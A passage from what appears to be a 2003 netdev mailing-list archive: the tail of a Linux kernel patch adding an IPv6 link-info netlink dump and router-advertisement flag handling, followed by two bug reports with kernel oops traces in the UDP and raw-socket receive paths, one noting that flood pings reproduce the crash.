(array) + kfree(array); + skb_trim(skb, b - skb->data); + return -1; +} + +static int inet6_dump_ifinfo(struct sk_buff *skb, struct netlink_callback *cb) +{ + int idx, err; + int s_idx = cb->args[0]; + struct net_device *dev; + struct inet6_dev *idev; + + read_lock(&dev_base_lock); + for (dev=dev_base, idx=0; dev; dev = dev->next, idx++) { + if (idx < s_idx) + continue; + if ((idev = in6_dev_get(dev)) == NULL) + continue; + err = inet6_fill_ifinfo(skb, dev, idev, RTM_NEWLINK, + NETLINK_CB(cb->skb).pid, cb->nlh->nlmsg_seq); + in6_dev_put(idev); + if (err <= 0) + break; + } + read_unlock(&dev_base_lock); + cb->args[0] = idx; + + return skb->len; +} + static struct rtnetlink_link inet6_rtnetlink_table[RTM_MAX - RTM_BASE + 1] = { + [RTM_GETLINK - RTM_BASE] = { .dumpit = inet6_dump_ifinfo, }, [RTM_NEWADDR - RTM_BASE] = { .doit = inet6_rtm_newaddr, }, [RTM_DELADDR - RTM_BASE] = { .doit = inet6_rtm_deladdr, }, [RTM_GETADDR - RTM_BASE] = { .dumpit = inet6_dump_ifaddr, }, diff -ruN linux-2.6.0-test1.plist/net/ipv6/ndisc.c linux-2.6.0-test1.new/net/ipv6/ndisc.c --- linux-2.6.0-test1.plist/net/ipv6/ndisc.c 2003-07-13 20:35:12.000000000 -0700 +++ linux-2.6.0-test1.new/net/ipv6/ndisc.c 2003-07-31 11:24:39.000000000 -0700 @@ -1037,6 +1037,17 @@ in6_dev->if_flags |= IF_RA_RCVD; } + /* + * Remember the managed/otherconf flags from most recently + * received RA message (RFC 2462) -- yoshfuji + */ + in6_dev->if_flags = (in6_dev->if_flags & ~(IF_RA_MANAGED | + IF_RA_OTHERCONF)) | + (ra_msg->icmph.icmp6_addrconf_managed ? + IF_RA_MANAGED : 0) | + (ra_msg->icmph.icmp6_addrconf_other ? + IF_RA_OTHERCONF : 0); + lifetime = ntohs(ra_msg->icmph.icmp6_rt_lifetime); rt = rt6_get_dflt_router(&skb->nh.ipv6h->saddr, skb->dev); From zwane@arm.linux.org.uk Thu Jul 31 19:31:14 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 19:31:21 -0700 (PDT) Received: from hemi.commfireservices.com ([66.212.224.118]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h712VCFl014808 for ; Thu, 31 Jul 2003 19:31:13 -0700 Received: from montezuma.mastecende.com (cuda.commfireservices.com [24.202.53.9]) by hemi.commfireservices.com (Postfix) with ESMTP id F2D96BC55 for ; Thu, 31 Jul 2003 22:20:06 -0400 (EDT) Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by montezuma.mastecende.com (8.12.8/8.12.8) with ESMTP id h712JVtE007393 for ; Thu, 31 Jul 2003 22:19:33 -0400 Date: Thu, 31 Jul 2003 22:19:31 -0400 (EDT) From: Zwane Mwaikambo X-X-Sender: zwane@montezuma.mastecende.com To: netdev@oss.sgi.com Subject: oops in udp_queue_rcv_skb Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4417 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: zwane@arm.linux.org.uk Precedence: bulk X-list: netdev I got this whilst doing transfers from a SAMBA server, kernel is 2.6.0-test2-mm2 on a 3way. Is there any specific information you require? Unable to handle kernel paging request at virtual address c4734068 printing eip: c04e58b6 *pde = 00012067 Oops: 0000 [#1] PREEMPT SMP DEBUG_PAGEALLOC CPU: 0 EIP: 0060:[] Not tainted VLI EFLAGS: 00010246 EIP is at udp_queue_rcv_skb+0x276/0x3e0 eax: 00000000 ebx: c8977060 ecx: 00000104 edx: 00000001 esi: c4734004 edi: c8977004 ebp: 00000000 esp: c06dde78 ds: 007b es: 007b ss: 0068 Process swapper (pid: 0, threadinfo=c06dc000 task=c0623a20) Stack: c897706c c06dc000 00000202 00000000 0300a8c0 cad60084 c4734004 c8977004 cad60084 c97ef038 c04e5fe2 c8977004 c4734004 c06dc000 2003c000 0300a8c0 ca789004 0300a8c0 0a00a8c0 c0687d18 00000000 c4734004 0a00a8c0 c04bcfc2 Call Trace: [] udp_rcv+0x222/0x3e0 [] ip_local_deliver+0x102/0x270 [] ip_rcv+0x37c/0x4e0 [] netif_receive_skb+0x153/0x1d0 [] process_backlog+0x87/0x160 [] net_rx_action+0x84/0x160 [] do_softirq+0xd3/0xe0 [] do_IRQ+0x1b5/0x250 [] default_idle+0x0/0x40 [] common_interrupt+0x18/0x20 [] default_idle+0x0/0x40 [] default_idle+0x2e/0x40 [] cpu_idle+0x3a/0x50 [] rest_init+0x0/0x90 [] start_kernel+0x171/0x190 Code: 43 86 57 68 ff 74 24 08 9d 8b 54 24 04 8b 42 14 48 89 42 14 8b 42 08 83 e0 08 <0>Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing (gdb) list *udp_queue_rcv_skb+0x276 0xc04e5cb6 is in udp_queue_rcv_skb (sock.h:942). 937 938 skb->dev = NULL; 939 skb_set_owner_r(skb, sk); 940 skb_queue_tail(&sk->sk_receive_queue, skb); 941 if (!sock_flag(sk, SOCK_DEAD)) 942 sk->sk_data_ready(sk, skb->len); 943 out: 944 return err; 945 } 946 -- function.linuxpower.ca From zwane@arm.linux.org.uk Thu Jul 31 22:46:45 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 31 Jul 2003 22:46:54 -0700 (PDT) Received: from hemi.commfireservices.com ([66.212.224.118]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h715kiFl005576 for ; Thu, 31 Jul 2003 22:46:45 -0700 Received: from montezuma.mastecende.com (cuda.commfireservices.com [24.202.53.9]) by hemi.commfireservices.com (Postfix) with ESMTP id E2531BC55 for ; Fri, 1 Aug 2003 01:35:38 -0400 (EDT) Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by montezuma.mastecende.com (8.12.8/8.12.8) with ESMTP id h715Z4tE020982 for ; Fri, 1 Aug 2003 01:35:05 -0400 Date: Fri, 1 Aug 2003 01:35:04 -0400 (EDT) From: Zwane Mwaikambo X-X-Sender: zwane@montezuma.mastecende.com To: netdev@oss.sgi.com Subject: oops in raw_rcv_skb Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4418 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: zwane@arm.linux.org.uk Precedence: bulk X-list: netdev You can reproduce this one easily by doing 5-6 ping -f of a system on the network (not loopback), originally picked up at http://bugme.osdl.org/show_bug.cgi?id=937 Unable to handle kernel paging request at virtual address c5100068 printing eip: c02ae8b6 *pde = 00015067 *pte = 05100163 Oops: 0000 [#1] CPU: 0 EIP: 0060:[] Not tainted EFLAGS: 00010246 EIP is at raw_rcv_skb+0x156/0x220 eax: 00000040 ebx: c52ed060 ecx: c4f6e024 edx: 00000014 esi: c52ed004 edi: c5100004 ebp: c52ed06c esp: c5661d24 ds: 007b es: 007b ss: 0068 Process ping (pid: 283, threadinfo=c5660000 task=c585f000) Stack: c5100000 c1169890 00001000 00000206 00000000 c1169890 c5100000 0000005a c5100004 c52ed004 c4f6e024 c54a2004 c02aea1d c52ed004 c5100004 c54a2038 00000030 00000001 c52ed004 c02ae569 c52ed004 c5100004 6164050a 1964050a Call Trace: [] raw_rcv+0x9d/0x110 [] raw_v4_input+0xa9/0x130 [] ip_local_deliver+0x8b/0x200 [] ip_rcv+0x37c/0x47a [] kernel_map_pages+0x28/0x5c [] netif_receive_skb+0x165/0x1f0 [] process_backlog+0x89/0x120 [] net_rx_action+0x91/0x110 [] do_softirq+0xd5/0xe0 [] do_IRQ+0x165/0x220 [] common_interrupt+0x18/0x20 [] pirq_sis_get+0x9b/0xc0 [] fput+0x2/0x20 [] poll_freewait+0x35/0x50 [] do_select+0x201/0x350 [] __pollwait+0x0/0xd0 [] sys_select+0x2db/0x4e0 [] pirq_sis_get+0x9b/0xc0 [] syscall_call+0x7/0xb Code: 8b 47 64 89 34 24 89 44 24 04 ff 96 50 01 00 00 eb b2 0f 0b <0>Kernel panic: Fatal exception in interrupt In interrupt handler - not syncing -- function.linuxpower.ca